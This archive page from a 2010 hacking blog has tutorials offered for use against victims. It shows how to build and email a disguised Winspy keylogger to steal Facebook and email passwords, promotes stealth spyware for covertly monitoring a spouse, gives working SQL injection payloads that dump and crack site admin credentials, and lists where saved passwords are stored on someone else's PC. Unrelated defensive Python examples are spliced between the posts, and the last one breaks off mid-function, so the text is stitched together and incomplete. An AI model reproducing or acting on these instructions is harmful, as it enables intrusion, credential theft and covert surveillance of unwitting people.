
Showing newest 10 of 24 posts from May 2010. Show older posts

Wednesday, May 26, 2010

Hack a Facebook password with winspy (Video)

I have made a couple of tutorials on Winspy, but most people who are new to this subject failed to understand them, so I am posting a video that shows how a Facebook password is captured with the Winspy keylogger. Winspy is a stealth-mode spyware keylogger that records keystrokes on both the local and a remote computer.

Steps followed in the video:
1. First of all, download the Winspy keylogger software from the link given below:

2. After downloading the Winspy keylogger, run the application. On the first run a dialog box is prompted: create a user ID and password and hit "Apply password". Remember this password, as it is required each time you start Winspy and even while uninstalling.

3. Another box now appears, explaining the hot keys (Ctrl + Shift + F12) that bring up the Winspy keylogger.

4. On pressing the hot keys, a login box appears asking for the user ID and password. Enter them and click OK.

5. Winspy's main screen is now displayed, as shown in the image below:

6. Select Remote at the top, then Remote install.
7. You will get a popup box as shown in the image. Fill in the following information in this box:

.user - type in the victim's name
.file name - the name of the file to be sent. Use a name the victim will be willing to accept.
.file icon - keep it the same
.picture - select the picture you want to attach to the keylogger.
In the "Email keylog to" text field, enter your email address. Hotmail accounts do not accept keylog files, so use another email account ID; my suggestion is a Gmail ID.
That's it. This much is enough; if you want, you can change other settings too.
8. After you have finished changing settings, click "Create Remote file". Now add your picture to a WinRAR archive. All that is left is to send this keylog file to your victim. When the victim opens the file, all keystrokes typed by the victim are sent to your email inbox, so you get all his passwords and can get into his email accounts and even his Facebook account.

Tuesday, May 25, 2010

Facebook is banned in Pakistan

Facebook has been banned in Pakistan after protests by the whole nation. The reason is that on the 20th of May an event was held on many Facebook pages about sketching the Holy Prophet (P.B.U.H.), which is unbearable for Muslims, so they protested and eventually Facebook was banned in many Muslim countries including Pakistan.

I think Facebook should apologize for this and should remove all such pages. We should respect all religions; I think that is real humanity.


No more Adsense accounts in India

It's very sad news to share...

AdSense has stopped approving new accounts from India, and you cannot change an existing account from some other country to India either.
Basically, it means no more accounts for Indians.

The only way to get an account now is to make a blog and keep updating it a little for six months.

After 6 months you might get an account with that blog.

Pakistan has also been added to the list of countries where you can change neither the payee name nor the address, and I think the 6-month restriction applies there too.

Not sure about the last point.

But it is indeed very sad news.

How to catch a cheating spouse

Is your spouse cheating on you? Do you want to catch a cheating spouse? Studies reveal that:
  • Only 46% of men believe that online affairs are adultery. (DivorceMag)
  • Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
  • One-third of divorce litigation is caused by online affairs. (The Fortino Group)
  • Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")

If you are in the same situation, then don't worry: Rafayhackingarticles has a solution for you.

This computer monitoring software will log and record what your spouse types, who they talk to, documents they open and print, what websites they visit, software titles they run, emails they send and receive, and even screenshots of their actual online activity.
Stop your cheating spouse in their tracks with our powerful monitoring spy software.

RafayHackingArticles recommends the following three spyware products:

SniperSpy - Remote password hacking software and remote monitoring

SniperSpy is the industry-leading remote password hacking software, combined with a remote install and remote viewing feature. Once it is installed on the remote PC(s) you wish, you only need to log in to your own personal SniperSpy account to view the activity logs of the remote PCs. This means that you can view the logs of the remote PCs from anywhere in the world, as long as you have internet access.

Spytech Realtime-Spy 

Realtime-Spy is the latest in cutting-edge computer monitoring technology that allows you to monitor ANY PC from ANYWHERE. Realtime-Spy is remotely deployable (no physical installation needed), and its activity logs are accessible from anywhere - regardless if the remote PC is online or not. Once installed, Realtime-Spy monitors the remote PC in total stealth, and cloaks itself to avoid being detected. Monitors keystrokes, website visits, windows viewed, and more!

Spytech Keystroke Spy

Keystroke Spy is a cost-effective monitoring solution that allows you to easily and efficiently log what your computer users are doing. Keystroke Spy is a powerful tool that can log every keystroke users type. Keystroke Spy can run in total stealth, email you when specific keywords are typed, and can even be set to log only keystrokes typed in specific applications.

Sunday, May 23, 2010

Hack websites using Auto SQL I Helper

In the recent posts we have seen the hacking of a site using manual SQL injection, for which it is essential to know the basics of SQL. Now we are going to look at advanced SQL injection.

To begin with, "SQLIHelperV.2.7" is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way into a website and trying hundreds of combinations and codes.
This tool does it all by itself. You only have to tell it what to do and where to look.

Let's start.
First you need to find a website that you think might be vulnerable. Remember that some websites are simply unhackable.

After you find your website (preferably one whose URL ends with "article.php?id=[number]"), for example: "http://encycl.anthropology.ru/article.php?id=1";

Check whether the website is injectable by going to this address:
http://www.domain.com/article.php?id='1 <------ notice the ' before the number 1.

You should get this message:

Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This means that the website can be hacked, because you get an error.

Now open SQL I Helper V.2.7
and enter the link:
http://www.domain.com/article.php?id=1 <---- without the '

and press the Inject button.

Now wait until the tool finishes searching for columns. The time may vary depending on your connection speed, your PC speed and the number of columns in the website.

Make sure that the website supports UNION, otherwise the injection won't work.

Now select any element from the "database name" box and press the "Get tables" button,

then select any element from the "table name" box and press the "Get columns" button,

then select any elements you want from the "columns name" box and press "Dump Now".

After clicking "Dump Now" you will see some hashes.

Now copy the hash onto a piece of paper and go to this website:


Enter the hash and press the "Crack that hash baby!" button and you should get the source of the hash.
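The error message the post tells you to look for appears because the request parameter is glued straight into the query text. The following added example (not code from the original post; SQLite stands in for the MySQL back end, and the article table, its rows and the handle_request wrapper are constructed for the demo) reproduces both sides: the concatenated query that breaks on a stray quote and returns attacker-chosen rows on a UNION, and the validated, parameterized query that does neither.

```python
"""Why article.php?id='1 throws a database error, and the fix.

Added example, not the original post's code. An in-memory SQLite table
named "article" with columns (id, title) stands in for the real site.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build the constructed demo table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """String concatenation: the request parameter becomes part of the SQL.

    Returns the rows, or the raw database error text, which is exactly the
    signal the post tells the reader to look for.
    """
    try:
        cur = conn.execute("SELECT * FROM article WHERE id=" + raw_id)
        return cur.fetchall()
    except sqlite3.OperationalError as exc:
        return "Query failed: " + str(exc)


def fetch_parameterized(conn: sqlite3.Connection, raw_id: str):
    """Validate the type, then bind the value as a parameter.

    The value travels separately from the query text, so a quote or a
    ' UNION ...' suffix in it is only data and is never parsed as SQL.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        return []  # not an integer: cannot be a valid article id
    cur = conn.execute("SELECT * FROM article WHERE id=?", (article_id,))
    return cur.fetchall()


def handle_request(conn: sqlite3.Connection, raw_id: str) -> dict:
    """What the page should send back: parameterized lookup, and a generic
    message on any failure so the raw database error never reaches the client
    (log it server-side instead)."""
    try:
        rows = fetch_parameterized(conn, raw_id)
    except sqlite3.Error:
        return {"status": 500, "body": "Internal error"}
    if not rows:
        return {"status": 404, "body": "Not found"}
    return {"status": 200, "body": rows}


if __name__ == "__main__":
    db = make_db()
    print(fetch_vulnerable(db, "'1"))          # raw syntax error text
    print(fetch_vulnerable(db, "-1 UNION ALL SELECT 1, 'leak'"))  # [(1, 'leak')]
    print(fetch_parameterized(db, "'1"))       # []
    print(handle_request(db, "1"))             # {'status': 200, 'body': [(1, 'first')]}
```

The two things that matter for a defender are visible side by side: parameter binding (plus a type check) removes the injection, and the generic error response removes the verbose message that the post uses as its "this site is injectable" test.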

Softwares for SQL injection

Now we are going to see some sites which help with SQL injection.
You can find out whether a site is vulnerable to SQL injection or not through this link.
Link: http://sql.wehostsite.com/
This is a kind of "part 2" of my SQL vulnerability finder script: just enter the vulnerable site URL and it will return the following:
*Order by
*Selection Id
*Database name

SQL commands [useful for Injection]

In the last post we saw how to hack an online site using SQL injection. This technique is quite easy to use and I think it is the best technique, but it is not applicable to new sites using cPanel. As you have understood the whole technique, I am now introducing some useful commands related to SQL injection:

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language 
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-  
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

Hack sites easily

Hello everyone. In the last post we saw password hacking when the passwords are saved on the PC. Now in this thread I am going to post something about SQL injection. It is a type of hacking with the help of which we can hack sites (mostly newly born sites and educational sites).

OK buddies, let's start, and kindly pay attention.

Let your mind think, and it is just child's play.

1) Search for a vulnerable site.
Highlight one, then press Ctrl+C and Ctrl+V in your browser address bar.


…and this one is just priceless…
“login: *” “password= *” filetype:xls


inurl: -> is a search parameter in Google so that it searches for results in the site's URL.
.php?5= -> is what I'm searching for in a URL. SQL injection works by adding code after the = symbol. This is also commonly referred to as a dork.
Dork definition: it's the part of the site's URL that tells you it may be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check its vulnerability by adding a magic quote (') at the end of the URL.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

3) So the URL will be like this:
We hit enter and get this result.
Database error: Invalid SQL
: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) 
If you get an error, some missing text or a blank page, the site is vulnerable, but not in every case.
Now we know that the site is vulnerable.

4) The next step is to find out how many columns the database contains.
To find this we use "order by" (without the quotes) and the string " -- " (no quotes).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
We move a little higher (it doesn't matter).
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we get an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
Now we get an error on this column; it looks like this.
Database error: Invalid SQL
: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
This means the database contains only 14 columns.

5) Now use "-" (a negative sign) and the union select statement.
Using this we can select more data in one SQL query.
It looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
We hit enter.
Numbers appear,
like this:
, 5

6) Now we will check its MySQL version. We put @@version in place of one of the numbers that appeared in the previous step.
Let me say I choose 8. We replace 8 with @@version, so it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
, 5
5.1.32 <--this is the version 

7) Getting the table name.
We use group_concat(table_name).
Replace @@version with group_concat(table_name)
and it looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
We're not done yet (don't hit enter):
between the number 14 and this "--" insert this:

It will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+
We hit enter and get this result:
ticle,ProjectPhoto,active_sessions_split,auth_user_md5
8) Now we're done with the TABLE NAME; we move on to the COLUMN NAME.
Use the string group_concat(column_name):
replace group_concat(table_name) with group_concat(column_name).
But before that we must choose one of the names returned. I choose auth_user_md5 because this is most likely what we want.
For a better result we need to hex-encode auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/

Paste auth_user_md5 into the text box and click encode.
Now we get the hex of
auth_user_md5; it looks like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
Before proceeding, remove the spaces between the numbers, like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) with group_concat(column_name),
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+
Replace also +from+information_schema.tables+where+ta
(The yellow letters and numbers are the auth_user_md5 hex we encoded.)
Note: always add 0x before the hex, like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where
Now hit enter and you get a result like this.
tName,MiddleName,LastName,Position,EmailAddress,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status
9) We use 0x3a to obtain what we want from the database, like password, username, etc.
Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3a,Status)
but I prefer to do this one, group_concat(Username,0x3a,Password), for less effort.
And also replace information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of
auth_user_md5, so we replace it.
The result looks like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
I hit enter and we get this:
admin username: k2admin / admin
password as an MD5 hash: 21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10) Because the password is an MD5 hash, we need to crack it.

: x1R0zYB3bex
You can ask anything you like.
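The walkthrough above leaves a recognisable trail in the web server's access log: a lone quote, a climbing ORDER BY sequence that ends in an error, then UNION SELECT together with information_schema and group_concat. As an added example (not code from the original post), the Python below parses combined-format access log lines, decodes the query string, and scores each client on how many of those signatures it triggered. The sample log lines, the IP addresses in them and the two-signature threshold are constructed for the demo.

```python
"""Flag SQL injection probing in a web access log.

Added example, not the original post's code. The log text, client addresses
and the alert threshold are constructed for the demonstration.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: one client replaying the walkthrough, one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.9 - - [23/May/2010:10:01:01 +0000] "GET /news_archive.php?id=6%27 HTTP/1.1" 500 512
203.0.113.9 - - [23/May/2010:10:01:05 +0000] "GET /news_archive.php?id=6+order+by+1-- HTTP/1.1" 200 4120
203.0.113.9 - - [23/May/2010:10:01:07 +0000] "GET /news_archive.php?id=6+order+by+14-- HTTP/1.1" 200 4120
203.0.113.9 - - [23/May/2010:10:01:09 +0000] "GET /news_archive.php?id=6+order+by+15-- HTTP/1.1" 500 512
203.0.113.9 - - [23/May/2010:10:01:20 +0000] "GET /news_archive.php?id=-6+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables-- HTTP/1.1" 200 6000
198.51.100.7 - - [23/May/2010:10:02:00 +0000] "GET /news_archive.php?id=6 HTTP/1.1" 200 4120
198.51.100.7 - - [23/May/2010:10:02:03 +0000] "GET /article.php?id=12 HTTP/1.1" 200 3900
"""

# Apache/nginx "combined"-style request line: client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Each signature corresponds to one step of the walkthrough. Matching is done
# on the percent-decoded target so 6%27 and 6' are treated the same.
SIGNATURES = [
    ("quote_probe", re.compile(r"=[^&]*'")),
    ("order_by_ramp", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("concat_dump", re.compile(r"group_concat\s*\(", re.I)),
]
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)


def parse_line(line: str):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded"] = unquote_plus(rec["target"])  # %27 -> ', + -> space
    return rec


def match_signatures(decoded_target: str):
    """Names of every signature found in a decoded request target."""
    return [name for name, rx in SIGNATURES if rx.search(decoded_target)]


def scan_log(text: str) -> dict:
    """Aggregate signature hits per client address.

    The highest ORDER BY index is kept because a ramp that climbs until the
    server answers 5xx is the column-counting step, not a normal request.
    """
    report = defaultdict(lambda: {"signatures": set(), "hits": 0,
                                  "errors": 0, "max_order_by": 0})
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        sigs = match_signatures(rec["decoded"])
        if not sigs:
            continue
        entry = report[rec["ip"]]
        entry["signatures"].update(sigs)
        entry["hits"] += 1
        if rec["status"] >= 500:
            entry["errors"] += 1
        m = ORDER_BY_RE.search(rec["decoded"])
        if m:
            entry["max_order_by"] = max(entry["max_order_by"], int(m.group(1)))
    return {ip: {**e, "signatures": sorted(e["signatures"])}
            for ip, e in report.items()}


def suspicious_ips(text: str, min_signatures: int = 2):
    """Clients that triggered at least min_signatures distinct signatures.

    A single quote can be a legitimate apostrophe in a search string, so one
    signature alone is not enough to raise an alert.
    """
    return sorted(ip for ip, e in scan_log(text).items()
                  if len(e["signatures"]) >= min_signatures)


if __name__ == "__main__":
    for ip, entry in scan_log(SAMPLE_LOG).items():
        print(ip, entry)
    print("suspicious:", suspicious_ips(SAMPLE_LOG))
```

On a real server, feed the access log through scan_log and alert on suspicious_ips; the combination of a quote probe, an ORDER BY ramp ending in a 5xx and information_schema in one client's traffic is the sequence this post describes, and it is far more specific than any one of those patterns on its own.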

where saved passwords are stored

This will help you when you gain access to someone's PC, or when you are using a friend's or enemy's system and want to know his/her passwords.


# Internet Explorer 4.00 - 6.00: The passwords are stored in a secret location in the Registry known as the "Protected Storage".
The base key of the Protected Storage is located under the following key:
ft\Protected Storage System Provider".
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to see the passwords, because they are encrypted.
Also, this key cannot easily be moved from one computer to another, as you can with regular Registry keys.

# Internet Explorer 7.00 - 8.00: The new versions of Internet Explorer store the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords. 
# Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.

# Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This file is an SQLite database which contains the encrypted passwords and other data.)

# Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

# Outlook Express (All Versions): The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

# Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key as the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect to an account on an Exchange server, the password is stored in the Credentials file, together with the login passwords of LAN computers.

# Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]
The account file is an XML file with the .oeaccount extension.

# ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search for a filename with the .s extension.
# Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]

# Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]

# MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:

1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or more)

# MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name] 
# Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=".

# Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)

# Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager - "ETS" value.
The value stored in "ETS" value cannot be recovered back to the original password.

# AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]

# AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

# ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
(MainLocation value)

# ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)

# Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

# PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].

Real Hacking Steps

1. Information Gathering/Foot printing
2. Port Scanning
3. OS Fingerprinting
4. Banner Grabbing
5. Vulnerability Assessment
6. Search & Build Exploit
7. Attack
8. Maintain Access with help of Root kits and Trojans.
9. Covering Tracks

1. Information Gathering / Foot printing

Information gathering is the process of getting maximum details about the target host. It is a very important part of remote hacking, because when we have more information about the target system we can launch more attacks.

Information gathering is done with these steps:
1. Find out the company URL / IP address
2. Google for more information from different websites
3. Footprinting through job sites
4. Find out the whois record of the target domain name (open www.who.is)
5. Find out the physical location of the victim (open www.whatismyipaddress.com)

Case-Study: 1.1
You are working in your company as a hacker, and your company wants the physical address, IP address, employee records and domain details. Your company gives you a domain name:

1. Open a DOS prompt and type ping kulhari.net [Enter]; after that you will get the IP address of the victim.
2. Open google.com and search kulhari.net (and browse the website for all information, like contact numbers, employee records and their services).
3. For the domain owner's email address and hosting company details, open www.who.is and type www.kulhari.net (or any target site).
4. For the physical location of the server, open www.whatismyipaddress.com and type the IP address that you got in step 1, and trace it after that.

Video Link 

2. Port Scanning

What is port?

A port is a medium for communication between 2 computers. Every service on a host is identified by a unique 16-bit number called a port.

Some default ports:

Port number ~ Service

7 ~ Ping
21 ~ FTP (File Transfer Protocol)
22 ~ SSH (Secure Shell)
23 ~ Telnet
25 ~ SMTP (Mail)
43 ~ WHOIS
53 ~ DNS
80 ~ HTTP
110 ~ POP3 (Mail Access)
513 ~ Rlogin
8080 ~ Proxy

TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are two of the protocols that make up the TCP/IP protocol suite, which is used universally to communicate on the Internet. Each of these has ports 0 through 65535 available, so essentially there are more than 65,000 doors to lock.

The first 1024 TCP ports are called the Well-Known Ports and are associated with standard services such as FTP, HTTP, SMTP or DNS.

What is port scanning?
It is similar to a thief going through your neighborhood and checking every door and window on each house to see which ones are open and which ones are locked.

What is port scanner?

A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by hackers to identify running services on a host with the view to compromising it. To port scan a host is to scan for listening ports on a single target host. To port sweep is to scan multiple hosts for a specific listening port.

Best port scanners: nmap, Hping2, Superscan.
Download link: http://sectools.org/

Why we perform port scanning?

We perform port scanning to find open services, so that afterwards we can search for exploits related to that service and application.

Demo video

NMAP (Port Scanner): A Hacker’s Best Friend

Nmap is a tool that has the ability to detect hosts, scan ports and identify OSes. Nmap has been used in The Matrix, Sword and many other hacking movies.

Nmap Modes of operation:

: This method of pinging sends a TCP packet to the host with the ACK flag set. If the host replies with an RST, then the host is up (running).

ICMP Ping (-PI): This is the standard ping used by UNIX / Linux boxes.

Connect() (-sT): All Linux/Unix systems provide a system call to connect to a machine on a specified port, with a given protocol.

SYN Stealth (-sS): This is a stealth scan in that it does not get logged.

How to find out your own computer's ports:
Open a DOS prompt and type the following command.

C:\> netstat -no
It then shows the active connections:
Active Connections

Proto ~ Local Address ~ Foreign Address ~ State ~ PID
TCP ~ ~ ~ ESTABLISHED ~ 2148
TCP ~ ~ ~ CLOSE_WAIT ~ 3064
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020

PID is the Process ID.
We can find out the associated application with the help of the following command:

C:\> tasklist

To terminate PID 2020 or another process:

C:\> taskkill /PID 2020

After that, all connections of that process will be closed on our system.

NOTE: We can tell whether our system is infected or not with the help of the commands described above.
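
The netstat/tasklist check above is done by eye in the post. As an added example (not code from the original), the Python below parses the text that `netstat -no` and `tasklist` print, joins the two on the PID, and flags processes that are not on an allowlist, that listen on every interface, or that hold established connections to uncommon remote ports. The two command outputs, the image name updater.exe, the allowlist and the port list are all constructed for the demo.

```python
"""Triage `netstat -no` plus `tasklist` output for unexpected connections.

Added example, not the original post's code. Both outputs below are
constructed samples in the format the Windows commands print.
"""
import re

NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.5:49212      203.0.113.50:443       ESTABLISHED     2020
  TCP    192.168.1.5:49213      203.0.113.50:443       ESTABLISHED     2020
  TCP    192.168.1.5:49300      198.51.100.20:110      CLOSE_WAIT      3064
  TCP    192.168.1.5:49310      192.0.2.77:6667        ESTABLISHED     2148
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2148
"""

TASKLIST_OUTPUT = """\

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         24 K
firefox.exe                   2020 Console                    1    120,416 K
outlook.exe                   3064 Console                    1     88,104 K
updater.exe                   2148 Console                    1      4,212 K
"""

# Constructed allowlist: the programs on this machine that are expected to
# talk to the network. Anything else with a socket deserves a look.
KNOWN_NETWORK_APPS = {"firefox.exe", "outlook.exe", "chrome.exe"}
# Remote ports a desktop normally connects to (web, mail, DNS). Constructed.
COMMON_REMOTE_PORTS = {53, 80, 443, 25, 110, 143, 993, 995}

TASK_RE = re.compile(r"^(?P<image>\S.*?)\s{2,}(?P<pid>\d+)\s")


def parse_netstat(text: str):
    """Rows of `netstat -no`: TCP rows carry a state, UDP rows do not."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
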